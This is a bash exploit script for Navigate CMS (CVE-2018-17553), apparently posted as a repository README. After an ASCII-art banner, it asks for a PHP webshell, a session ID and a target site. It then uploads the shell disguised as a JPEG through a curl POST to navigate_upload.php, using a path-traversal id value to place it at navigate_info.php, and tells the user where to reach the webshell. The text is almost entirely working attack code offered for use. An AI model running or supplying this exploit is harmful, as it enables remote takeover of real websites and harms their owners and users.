README.md
Rendering markdown...
#!/bin/bash
clear
echo ""
echo " .ckk; "
echo " .cc, .xWMMk. "
echo " .dMMNx. ,KMMNc "
echo " :XMMMd :XWO, "
echo " 'dKMXc '0M0' "
echo " .kWNo. .',:lodxxxdoOWWo. "
echo " .oNW0OXNWMMMMMMMMMMMWXOo;. "
echo " ,xNMMMMMMMMMWNNNWMMMMMMMWKd, "
echo " ,xNMMMMMMMNOl:,'.cKMKolx0NMMMNx' "
echo " .lXMMMMW00NMWx...';kWNl .,l0WMMK: "
echo " .,:c;' .dNMMMW0:..l0NWXKXNWMMW0o, .:do;. "
echo " .oNMMMNOoc:,'dNMMMNd. 'xKNWKxl:::cdONWO, "
echo " .lOKK000XNNNWMMMMKl,':0MMKl. ,oo' "
echo " ... ..';kWMMMNXNNNWMKx; "
echo " oMMMNc.',dNMd. Navigate CMS "
echo " lWMM0, '0Mx'. CVE-2018-17553 "
echo " ,KMMK, cx;. "
echo " oWMWl "
echo " .oxc. "
echo ""
echo ""
echo "Where is your PHP webshell?"
echo ""
read exploit
echo ""
echo "What is your session ID?"
echo ""
read session
echo ""
echo "What is the site you're you're attacking?"
echo ""
read site
echo ""
cp $exploit ./exploit.jpg
echo ""
curl -X POST -H "Content-type:multipart/form-data" -F "name=exploit.jpg" -F "session_id=$session" -F "engine=picnik" -F "id=../../../navigate_info.php" -F "[email protected]" $site/navigate/navigate_upload.php
rm ./exploit.jpg
echo "Browse to $site/navigate/navigate_info.php to access your webshell."